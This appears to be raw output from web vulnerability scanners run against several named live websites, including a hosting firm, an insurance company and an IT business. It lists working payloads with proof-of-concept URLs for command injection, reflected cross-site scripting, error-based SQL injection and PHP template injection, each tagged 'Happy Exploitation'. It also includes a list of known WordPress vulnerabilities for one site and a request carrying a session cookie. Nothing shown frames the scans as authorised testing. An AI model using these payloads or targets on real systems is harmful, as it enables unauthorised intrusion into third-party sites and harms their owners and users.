[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK 
TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC:
https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[!] Congratulations you've found 48 bugs :-)
[!] Enter the URL:
http://www.jfuinsurance.com/insurance/index.php?id=1137
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host:
http://www.jfuinsurance.com
[!] WebServer: Apache
[!] x-powered-by
[!] PHP/5.3.29
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....[*] Payload Found . . .[*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: Message: SQL: SELECT a.*, b.topic_name AS category_name, c.group_id FROM engine2_articles a LEFT JOIN engine2_article_views b ON a.category_id=b.category_id AND b.view_id = 1000 LEFT JOIN engine2_article_categories c ON a.category_id=c.category_id WHERE a.article_id=1137\'>zigoo0<svg/onload=confirm(/zigoo0/)>web[*] POC:
http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'>zigoo0<svg/onload=confirm(/zigoo0/)>web' at line 1[*] POC:
http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: Message: SQL: SELECT a.*, b.topic_name AS category_name, c.group_id FROM engine2_articles a LEFT JOIN engine2_article_views b ON a.category_id=b.category_id AND b.view_id = 1000 LEFT JOIN engine2_article_categories c ON a.category_id=c.category_id WHERE a.article_id=1137x\"x>x[*] POC:
http://www.jfuinsurance.com/insuranc...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"x>x' at line 1[*] POC:
http://www.jfuinsurance.com/insuranc...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: Message: SQL: SELECT a.*, b.topic_name AS category_name, c.group_id FROM engine2_articles a LEFT JOIN engine2_article_views b ON a.category_id=b.category_id AND b.view_id = 1000 LEFT JOIN engine2_article_categories c ON a.category_id=c.category_id WHERE a.article_id=1137\">zigoo0<svg/onload=confirm(/zigoo0/)>web[*] POC:
http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\">zigoo0<svg/onload=confirm(/zigoo0/)>web' at line 1[*] POC:
http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29% 3Eweb
[!] Code Snippet: Message: SQL: SELECT a.*, b.topic_name AS category_name, c.group_id FROM engine2_articles a LEFT JOIN engine2_article_views b ON a.category_id=b.category_id AND b.view_id = 1000 LEFT JOIN engine2_article_categories c ON a.category_id=c.category_id WHERE a.article_id=1137zigoo0<svg/onload=confirm(/zigoo0/)>web[*] POC:
http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[!] Congratulations you've found 7 bugs :-)
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1[*] POC:
http://www.jfuinsurance.com/insuranc...x.php?id=11373'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\' at line 1[*] POC:
http://www.jfuinsurance.com/insuranc...hp?id=11373%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"()' at line 1[*] POC:
http://www.jfuinsurance.com/insuranc...73%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3'><
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'><' at line 1[*] POC: http://www.jfuinsurance.com/insurance/index.php?id=11373'><[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%25 00%3E%25bf%2527%27
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"\\\'\\\");|]*{%0d%0a<%00>%bf%27\'' at line 1[*] POC:
http://www.jfuinsurance.com/insuranc...E%25bf%2527%27[*] Happy Exploitation

[!] Congratulations you've found 5 bugs :-)
[!] Enter the URL:
http://www.eulinx.com/shop/ShowCateg...p?CategoryID=1
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host:
http://www.eulinx.com
[!] WebServer: Apache
[!] x-powered-by
[!] PleskLin
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: <META NAME="KEYWORDS" CONTENT=" Stoke, Hanley, Leek, Liverpool, Louisianna, Atlanta, Florida, United Kingdom, UK, USA, European , International, European, Engineering, Computer, I.T., Support, management, recruitment, estate agent, multi media, community, group, aid, charity, EULINX ~ IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support memorial day myspace facebook email database sql microsoft , liniux, data recovery, IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support, Business Consultancy and System Integration Business Continuity Consultants.">[*] POC:
http://www.eulinx.com/shop/ShowCateg...?CategoryID=13'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''13''[*] POC:
http://www.eulinx.com/shop/ShowCateg...?CategoryID=13'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: <META NAME="KEYWORDS" CONTENT=" Stoke, Hanley, Leek, Liverpool, Louisianna, Atlanta, Florida, United Kingdom, UK, USA, European , International, European, Engineering, Computer, I.T., Support, management, recruitment, estate agent, multi media, community, group, aid, charity, EULINX ~ IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support memorial day myspace facebook email database sql microsoft , liniux, data recovery, IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support, Business Consultancy and System Integration Business Continuity Consultants.">[*] POC:
http://www.eulinx.com/shop/ShowCateg...tegoryID=13%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''13\'[*] POC:
http://www.eulinx.com/shop/ShowCateg...tegoryID=13%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: <META NAME="KEYWORDS" CONTENT=" Stoke, Hanley, Leek, Liverpool, Louisianna, Atlanta, Florida, United Kingdom, UK, USA, European , International, European, Engineering, Computer, I.T., Support, management, recruitment, estate agent, multi media, community, group, aid, charity, EULINX ~ IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support memorial day myspace facebook email database sql microsoft , liniux, data recovery, IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support, Business Consultancy and System Integration Business Continuity Consultants.">[*] POC:
http://www.eulinx.com/shop/ShowCateg...13%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"()'[*] POC:
http://www.eulinx.com/shop/ShowCateg...13%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%25 00%3E%25bf%2527%27
[!] Code Snippet: <META NAME="KEYWORDS" CONTENT=" Stoke, Hanley, Leek, Liverpool, Louisianna, Atlanta, Florida, United Kingdom, UK, USA, European , International, European, Engineering, Computer, I.T., Support, management, recruitment, estate agent, multi media, community, group, aid, charity, EULINX ~ IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support memorial day myspace facebook email database sql microsoft , liniux, data recovery, IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support, Business Consultancy and System Integration Business Continuity Consultants.">[*] POC:
http://www.eulinx.com/shop/ShowCateg...E%25bf%2527%27[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%25 00%3E%25bf%2527%27
[!] Code Snippet: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''13"\'\");|]*{%0d%0a<%00>%bf%27''[*] POC:
http://www.eulinx.com/shop/ShowCateg...E%25bf%2527%27[*] Happy Exploitation

[!] Congratulations you've found 8 bugs :-)
GET parameter: CategoryID
Engine: Smarty
Injection: 1}*{
Context: code
OS: undetected
Technique: blind
Capabilities:
Code evaluation: yes, php code (blind)
Shell command execution: no
File write: no
File read: no
Bind and reverse shell: no
[+] WordPress version 4.5.2 identified from advanced fingerprinting (Released on 2016-05-06)
[!] 8 vulnerabilities identified from the version number
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference:
https://wpvulndb.com/vulnerabilities/8518
Reference:
https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference:
https://github.com/WordPress/WordPre...7281de83e32648
Reference:
https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5833
Reference:
https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5834
[i] Fixed in: 4.5.3
[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference:
https://wpvulndb.com/vulnerabilities/8519
Reference:
https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference:
https://github.com/WordPress/WordPre...7806953d1a25a1
Reference:
https://www.wordfence.com/blog/2016/...otected-posts/
Reference:
https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5835
[i] Fixed in: 4.5.3
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference:
https://wpvulndb.com/vulnerabilities/8520
Reference:
https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference:
https://github.com/WordPress/WordPre...ca5e7fab6f307c
Reference:
https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5837
[i] Fixed in: 4.5.3
[!] Title: WordPress 4.5.2 - Redirect Bypass
Reference:
https://wpvulndb.com/vulnerabilities/8522
Reference:
https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference:
https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5832
[i] Fixed in: 4.5.3
[!] Title: WordPress 4.5.2 - oEmbed Denial of Service (DoS)
Reference:
https://wpvulndb.com/vulnerabilities/8523
Reference:
https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference:
https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5836
[i] Fixed in: 4.5.3
[!] Title: WordPress 4.5.2 - Password Change via Stolen Cookie
Reference:
https://wpvulndb.com/vulnerabilities/8524
Reference:
https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference:
https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5838
[i] Fixed in: 4.5.3
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference:
https://wpvulndb.com/vulnerabilities/8615
Reference:
https://wordpress.org/news/2016/09/w...nance-release/
Reference:
https://github.com/WordPress/WordPre...ea891e4726d6e0
Reference:
https://sumofpwn.nl/advisory/2016/pe...ile_names.html
Reference:
http://seclists.org/fulldisclosure/2016/Sep/6
Reference:
https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-7168
[i] Fixed in: 4.5.4
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference:
https://wpvulndb.com/vulnerabilities/8616
Reference:
https://wordpress.org/news/2016/09/w...nance-release/
Reference:
https://github.com/WordPress/WordPre...d3ea790caa0b6e
Reference:
https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-7169
[i] Fixed in: 4.5.4
Hostname eulinx.com was found in DNS cache
Trying 217.149.108.240...
Connected to eulinx.com (217.149.108.240) port 80 (#8)
GET /wp-content/themes/ifeaturepro5/style.css HTTP/1.1
Host: eulinx.com
Accept: */*
Referer:
http://eulinx.com/
Cookie: PHPSESSID=2ur41e2tkgbdsqvg5cho7aht42; wordpress_test_cookie=WP+Cookie+check

